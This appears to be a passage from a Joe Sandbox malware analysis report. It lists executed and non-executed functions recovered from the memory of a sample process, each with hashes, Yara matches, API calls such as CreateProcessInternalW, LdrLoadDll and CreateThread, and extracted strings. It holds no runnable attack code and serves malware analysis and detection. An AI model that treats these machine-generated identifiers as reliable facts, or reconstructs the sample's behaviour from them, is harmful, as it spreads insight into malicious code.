                                                • Opcode ID: 6d7f457d6199042e502e2ac0c245d0c8de30e3e21a0bf44669ca6593869e8218
                                                • Instruction ID: e89b3da8b91ff66f618db3abc87008850682b9d9e4b8db5f6d18b06c31ae803c
                                                • Opcode Fuzzy Hash: 6d7f457d6199042e502e2ac0c245d0c8de30e3e21a0bf44669ca6593869e8218
                                                • Instruction Fuzzy Hash: 0490027170180813D111B19C550470B044997D0251F99C412A4424559D97568A52B121
                                                Function 03592C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 1bddd35bbd90b93d7214d4604dcc70da745349504d170f9327ec8d8486624c91
                                                • Instruction ID: 9eed2a485d0e5c12ecb6864b56686be1173e9e836e3aee4449feb31df17441eb
                                                • Opcode Fuzzy Hash: 1bddd35bbd90b93d7214d4604dcc70da745349504d170f9327ec8d8486624c91
                                                • Instruction Fuzzy Hash: 0B90027170188C02D110B19C940474E044597D0311F5DC411A8424659D879589917121
                                                Function 03592C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 8141ccf6ca33ab23e4c91d1fe9c7eeacf40085321322172cbf277f630cefbafb
                                                • Instruction ID: 4205b72566c003a10762c1f46554ed5285117d5b5517158943a6364464ae97e0
                                                • Opcode Fuzzy Hash: 8141ccf6ca33ab23e4c91d1fe9c7eeacf40085321322172cbf277f630cefbafb
                                                • Instruction Fuzzy Hash: 4590027170180C42D100B19C5404B4A044597E0311F59C016A4124655D8715C9517521
                                                Function 03592CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 8fa53d73ff2e1b269d716ac249b6fe28e5e6fe2b61ab82d5e3f956a2735cab99
                                                • Instruction ID: d75386badfaae3a093841e68bafaf30e6c61d163710348ff55d3cf8949a56daf
                                                • Opcode Fuzzy Hash: 8fa53d73ff2e1b269d716ac249b6fe28e5e6fe2b61ab82d5e3f956a2735cab99
                                                • Instruction Fuzzy Hash: 1F90027170180802D100B5DC640864A044597E0311F59D011A9024556EC76589917131
                                                Function 035935C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 27483a34db8242fdefff7182fbb1eb5fb227ecdb5f6684428306dc35d37928b9
                                                • Instruction ID: 2808f6e77d7b1143dde73ca5dc3f5950d17cc3a6e5b7219e8075574b13fab64b
                                                • Opcode Fuzzy Hash: 27483a34db8242fdefff7182fbb1eb5fb227ecdb5f6684428306dc35d37928b9
                                                • Instruction Fuzzy Hash: B5900271B0590802D100B19C551470A144597D0211F69C411A4424569D87958A5175A2
                                                Function 035939B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: e9271e2754fc8dffdd98d4990fface8b89d2c807416b0af8062c039a93135c3a
                                                • Instruction ID: 4abb33c70d87c357611839b9eda23d1db38afc40d0a049b8a15851c3dcf4a71f
                                                • Opcode Fuzzy Hash: e9271e2754fc8dffdd98d4990fface8b89d2c807416b0af8062c039a93135c3a
                                                • Instruction Fuzzy Hash: 4390026174585502D150B19C540461A4445B7E0211F59C021A4814595D865589557221
                                                Function 02CE0D08 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66threadwindowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 647 2ce0d08-2ce0d0a 648 2ce0d0c-2ce0d0e 647->648 649 2ce0d25-2ce0d7a call 2cfa1f0 call 2cfac00 call 2ce4660 call 2cd1410 call 2cf14c0 647->649 650 2ce0d7e-2ce0d8b PostThreadMessageW 648->650 651 2ce0d10-2ce0d22 648->651 654 2ce0d9a-2ce0da0 649->654 664 2ce0d7c 649->664 653 2ce0d8d-2ce0d97 650->653 650->654 651->649 653->654 664->650
                                                APIs
                                                • PostThreadMessageW.USER32(-02n08K,00000111,00000000,00000000), ref: 02CE0D87
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4128079156.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_2cd0000_reg.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: -02n08K$-02n08K
                                                • API String ID: 1836367815-2765054273
                                                • Opcode ID: 58d9228eb410093aba107297153175491df87c43f7b9c8789040e87b18c8d984
                                                • Instruction ID: 4edefea7cacd946db80ab6067499a2aef14acf569fbb2a2b59d599bc35195505
                                                • Opcode Fuzzy Hash: 58d9228eb410093aba107297153175491df87c43f7b9c8789040e87b18c8d984
                                                • Instruction Fuzzy Hash: A911E5B2D0020C7AEB00AAE18C81DEFBB6DDF85798F448069FA1477100D2B55F064BF1
                                                Function 02CE0D10 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • PostThreadMessageW.USER32(-02n08K,00000111,00000000,00000000), ref: 02CE0D87
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4128079156.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_2cd0000_reg.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: -02n08K$-02n08K
                                                • API String ID: 1836367815-2765054273
                                                • Opcode ID: f7bde5019313a3fb4120021813f2a098691fa0f7731b0cb77547ce2e9577b4a8
                                                • Instruction ID: 3a98d35c6a07c7b85e7ee71503d6b0518a9139c059450152d56dc6d9473a497f
                                                • Opcode Fuzzy Hash: f7bde5019313a3fb4120021813f2a098691fa0f7731b0cb77547ce2e9577b4a8
                                                • Instruction Fuzzy Hash: B30184B2D0025CBAEB10AAE58C81DEFBB7CDF81694F458065FA18A7140D6755E064BF1
                                                Function 02CF2DA0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 103sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Sleep.KERNELBASE(000007D0), ref: 02CF2E5D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4128079156.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_2cd0000_reg.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Sleep
                                                • String ID: net.dll$wininet.dll
                                                • API String ID: 3472027048-1269752229
                                                • Opcode ID: d81da4ade7945dfd02c8d9f993767653c80a4975a00db775332c4158b02ee551
                                                • Instruction ID: 3eda0dbbf0682a6d23c500f8fa72d7b062be6b26dd8d515d6be5fa4ed3d3b46d
                                                • Opcode Fuzzy Hash: d81da4ade7945dfd02c8d9f993767653c80a4975a00db775332c4158b02ee551
                                                • Instruction Fuzzy Hash: E4316BB1600605ABC764DF64DC80FEBFBA8AB88704F50851DAA595B280E770A644CBA5
                                                Function 02CEEE15 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 104COMMON
                                                Download Yara Rule
                                                APIs
                                                • CoInitialize.OLE32(00000000), ref: 02CEEE37
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4128079156.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_2cd0000_reg.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Initialize
                                                • String ID: @J7<
                                                • API String ID: 2538663250-2016760708
                                                • Opcode ID: 139d33829c5e45b6fc538b108dbf4e786499b65bcf5cde22b187e87322c88bcf
                                                • Instruction ID: f60efcf77b4a0063ee120d06ebddb6e7fe517e1ba730575ad3ecb4e4ea90a0c0
                                                • Opcode Fuzzy Hash: 139d33829c5e45b6fc538b108dbf4e786499b65bcf5cde22b187e87322c88bcf
                                                • Instruction Fuzzy Hash: 8B3132B6A0060A9FDF00DFD8C8809EEB7B9FF88314F108559E516EB214D775EA45CBA1
                                                Function 02CEEE20 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON
                                                Download Yara Rule
                                                APIs
                                                • CoInitialize.OLE32(00000000), ref: 02CEEE37
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4128079156.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_2cd0000_reg.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Initialize
                                                • String ID: @J7<
                                                • API String ID: 2538663250-2016760708
                                                • Opcode ID: b6d9ab6b87389ba439d2d1c5eb5731c3c39368f2096b425f8e524e04009d09b3
                                                • Instruction ID: 7d8111851bca9aaa38668b6114da840083c61cec1b26d8776745e81b792b1dda
                                                • Opcode Fuzzy Hash: b6d9ab6b87389ba439d2d1c5eb5731c3c39368f2096b425f8e524e04009d09b3
                                                • Instruction Fuzzy Hash: 3B3132B5A0060A9FDB00DFD8C8809EFB7B9BF88314F108559E506EB214D775EE45CBA1
                                                Function 02CE4660 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02CE46D2
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4128079156.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_2cd0000_reg.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: 5017eacf575fa66b987127cbb462bddf0181e3326ae4c73234eae0b8cd340783
                                                • Instruction ID: 376e94f542a29e9674012238e8f4d224c6b20e982243315d9fb4a56260609c46
                                                • Opcode Fuzzy Hash: 5017eacf575fa66b987127cbb462bddf0181e3326ae4c73234eae0b8cd340783
                                                • Instruction Fuzzy Hash: 43011AB5E4020DABDF54EBA4DC41FDEB3B99B44708F0081A5AA099B240F631EB58DB91
                                                Function 02CF8650 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateProcessInternalW.KERNELBASE(?,?,?,?,02CE7F43,00000010,?,?,?,00000044,?,00000010,02CE7F43,?,?,?), ref: 02CF86B0
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4128079156.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_2cd0000_reg.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateInternalProcess
                                                • String ID:
                                                • API String ID: 2186235152-0
                                                • Opcode ID: 86d479472fb2d9ceda1078d8cee44a141ef48acef7f1a38b0f9f0d019a356b31
                                                • Instruction ID: a270809c1f18a844845a91cda62ad4e7ceb32b9eec2e125553e8a9d5bbba15d0
                                                • Opcode Fuzzy Hash: 86d479472fb2d9ceda1078d8cee44a141ef48acef7f1a38b0f9f0d019a356b31
                                                • Instruction Fuzzy Hash: 1F0180B2204509BBDB48DF99DD81EEB77EDAF8C754F418218BA09E3241D634F8518BA4
                                                Function 02CD9720 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02CD9765
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4128079156.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_2cd0000_reg.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateThread
                                                • String ID:
                                                • API String ID: 2422867632-0
                                                • Opcode ID: 4ddc6c21393efbfb1de144e7b600a65328063a2df9ac14992f13b191840df733
                                                • Instruction ID: f4d14bbe5ba17382ed03780dbd26e1eaea17c01a5ec014ebaa47dd19451bb56b
                                                • Opcode Fuzzy Hash: 4ddc6c21393efbfb1de144e7b600a65328063a2df9ac14992f13b191840df733
                                                • Instruction Fuzzy Hash: 4DF06D7338060476E36076E99C02FD7B78C9BC4B76F180426F70DEB1C0DAA6B84156A8
                                                Function 02CD971D Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02CD9765
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4128079156.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_2cd0000_reg.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateThread
                                                • String ID:
                                                • API String ID: 2422867632-0
                                                • Opcode ID: d9b90881fd8a7f68a220f2a3bf820bf0ecbf3c0dc62b1e0c38c44b21eb71fc23
                                                • Instruction ID: 20251328270fd64e7b6f977b270776b95ee9366147405ba55c9d00ef12be4da6
                                                • Opcode Fuzzy Hash: d9b90881fd8a7f68a220f2a3bf820bf0ecbf3c0dc62b1e0c38c44b21eb71fc23
                                                • Instruction Fuzzy Hash: CAF0927324061476E27072A98C06FE7B68CDF85B75F140419F70DAB1C0DAE6B84186F8
                                                Function 02CF85C0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,BC8D9489,00000007,00000000,00000004,00000000,02CE3F3A,000000F4,?,?,?,?,?), ref: 02CF85FC
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4128079156.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_2cd0000_reg.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID:
                                                • API String ID: 3298025750-0
                                                • Opcode ID: 85b9538c6281af8b05fcab1f31e6d4afb2cc1f92716cd5a024de01b70d871b70
                                                • Instruction ID: 263ebdc199ea9083f8e591b5b73a8aa8ebf3d4976a7005d16ebacbf1e364edbb
                                                • Opcode Fuzzy Hash: 85b9538c6281af8b05fcab1f31e6d4afb2cc1f92716cd5a024de01b70d871b70
                                                • Instruction Fuzzy Hash: 84E0EDB16006047BD614EE99DC41FDB77ADEF85714F408419FA09A7241D671B911CBB4
                                                Function 02CF8570 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RtlAllocateHeap.NTDLL(02CE18A6,?,02CF48B1,02CE18A6,02CF48A7,02CF48B1,?,02CE18A6,02CF48A7,00001000,?,?,02CF9E40), ref: 02CF85AC
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4128079156.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_2cd0000_reg.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: 38bc7af278630d5790ec7858ceff0b22a3025680cf158ac78260adce428242f9
                                                • Instruction ID: c4549eb26b732254a35d7e413078104fa1d6e60d33cc99f913a052b8a992a066
                                                • Opcode Fuzzy Hash: 38bc7af278630d5790ec7858ceff0b22a3025680cf158ac78260adce428242f9
                                                • Instruction Fuzzy Hash: C0E012716002087BDB14EF99DC41FDB77ADEFC5714F404419FA09A7241D670B9518BB4
                                                Function 02CE7F80 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetFileAttributesW.KERNELBASE(?), ref: 02CE7FAC
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4128079156.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_2cd0000_reg.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: b1209a9e472cea2492028bccd4f93571205a64cf1dde7bba1e3b049150618745
                                                • Instruction ID: de3d5a49f07a05709d5fee42f2f7277c72daff57b8f755956a7774559797c2f7
                                                • Opcode Fuzzy Hash: b1209a9e472cea2492028bccd4f93571205a64cf1dde7bba1e3b049150618745
                                                • Instruction Fuzzy Hash: 22E0867624020827FF246AA8DC45F76B3588BC876CF284660B92DDB2C1E67AF64545A1
                                                Function 02CE7D90 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetErrorMode.KERNELBASE(00008003,?,?,02CE1B80,02CF6FC7,02CF48A7,?), ref: 02CE7DC3
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4128079156.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_2cd0000_reg.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorMode
                                                • String ID:
                                                • API String ID: 2340568224-0
                                                • Opcode ID: 0eda40334b61d156b41ed8ce7e293b29b49843f04f20514bafed39ea13c4d92a
                                                • Instruction ID: 6699dc0a68bcca59f7ca1dc7589fd6fd7c1eb68ce4e70b5a6ea4697d89e8fb09
                                                • Opcode Fuzzy Hash: 0eda40334b61d156b41ed8ce7e293b29b49843f04f20514bafed39ea13c4d92a
                                                • Instruction Fuzzy Hash: 24D05EB22443043BF640B6E59C46F26328D5B8075CF084064BA0CE72C1E9A6F1005A65
                                                Function 02CD9777 Relevance: 1.5, APIs: 1, Instructions: 18threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02CD9765
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4128079156.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_2cd0000_reg.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateThread
                                                • String ID:
                                                • API String ID: 2422867632-0
                                                • Opcode ID: f8bcd30a29aa0707ceb7d8944c4ecc16d357de2e9c5a422d8a6d9e40a625528a
                                                • Instruction ID: 79f2540d415ec64aa11b230ff1998a50c82df3a74d43fc368664dd7b46dd86d5
                                                • Opcode Fuzzy Hash: f8bcd30a29aa0707ceb7d8944c4ecc16d357de2e9c5a422d8a6d9e40a625528a
                                                • Instruction Fuzzy Hash: 68D01236380614B1F1B029599C42FA992088FC0B16F350416F308E91C0869268454028
                                                Function 03592C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 55468022d3a848b25242ee55ede8398d7b50cd3b064dd0b02a463414de0f3cd6
                                                • Instruction ID: ec80e57e9c9c71dd11281f3af909b24476ecf0c8c6f7c4fa885cc543154018c5
                                                • Opcode Fuzzy Hash: 55468022d3a848b25242ee55ede8398d7b50cd3b064dd0b02a463414de0f3cd6
                                                • Instruction Fuzzy Hash: FAB04C71A019C995EA11E764560861A79447790711F19C462D2020652A47299191E175

                                                Non-executed Functions

                                                Function 0342B80A Relevance: 56.5, Strings: 45, Instructions: 215COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129910472.0000000003420000.00000040.00000800.00020000.00000000.sdmp, Offset: 03420000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3420000_reg.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                • API String ID: 0-3558027158
                                                • Opcode ID: 727c4c1466ffcd7d94700a0b6b9115cb144e492d2d7dd19bd3bfc639422cd25d
                                                • Instruction ID: c84368720a189c2acc32da5052137415e897d78009bb84c403ca4e418c7c0076
                                                • Opcode Fuzzy Hash: 727c4c1466ffcd7d94700a0b6b9115cb144e492d2d7dd19bd3bfc639422cd25d
                                                • Instruction Fuzzy Hash: 15914FF04082988AC7158F55A0612AFFFB1EBC6305F15816DE7A6BB243C3BE8945CB85
                                                Function 03422CEA Relevance: 30.1, Strings: 24, Instructions: 70COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129910472.0000000003420000.00000040.00000800.00020000.00000000.sdmp, Offset: 03420000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3420000_reg.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: &$n$ 11-$ 5(.$ 7('$$#1m$$n 1$&$n6$(" 5$(, &$(./n$-m 1$/&mk$/n9)$0|qo$1-("$5$95$5,-j$9,-m$9,-z$m(, $n)5,$nkz0$xm(,$|qoy
                                                • API String ID: 0-2801251792
                                                • Opcode ID: b9ad030fc7b4968b14350e04c4caf3834b2f027c68668689d4c95212abf4c960
                                                • Instruction ID: 8a1cac1d568e07110f5e31d2d0c51e9a3234a05f4f3e3b7dc032b22ce0423667
                                                • Opcode Fuzzy Hash: b9ad030fc7b4968b14350e04c4caf3834b2f027c68668689d4c95212abf4c960
                                                • Instruction Fuzzy Hash: E83185B440470DDBCB29DF90D9416DEBBB2FF05304F81565EE8086E241C67A8A95CB89
                                                Function 03592890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                • API String ID: 48624451-2108815105
                                                • Opcode ID: ad5bf9dabe357113bc94acbc74b5c9ffba7cf372ef2e0b22e5fbb2f2602fe66b
                                                • Instruction ID: 306c0a5fdcea7f57ff43bc398d3c696d871787ba45c121bf4baf0fcc9c31fda3
                                                • Opcode Fuzzy Hash: ad5bf9dabe357113bc94acbc74b5c9ffba7cf372ef2e0b22e5fbb2f2602fe66b
                                                • Instruction Fuzzy Hash: 6951FBB5A0025EBFDF10DB98E88057EFBBCBB48204B54C96AE465D7651D334DE508BE0
                                                Function 03602410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                • API String ID: 48624451-2108815105
                                                • Opcode ID: f1a05b031dcc628b1c53f42712b5623b48e34f43a01da84fb52b7e6ad5566aa7
                                                • Instruction ID: 9c1bdbb14bd506c2f4d24970321a5cd305ede4963b3f0e0cd273ceaf50942ef6
                                                • Opcode Fuzzy Hash: f1a05b031dcc628b1c53f42712b5623b48e34f43a01da84fb52b7e6ad5566aa7
                                                • Instruction Fuzzy Hash: 5D510675A00645AECB38DF9CC9A587FF7FDEF48204B04885AE495D76C1E7B4DA408760
                                                Function 03587630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                Download Yara Rule
                                                Strings
                                                • Execute=1, xrefs: 035C4713
                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 035C4725
                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 035C46FC
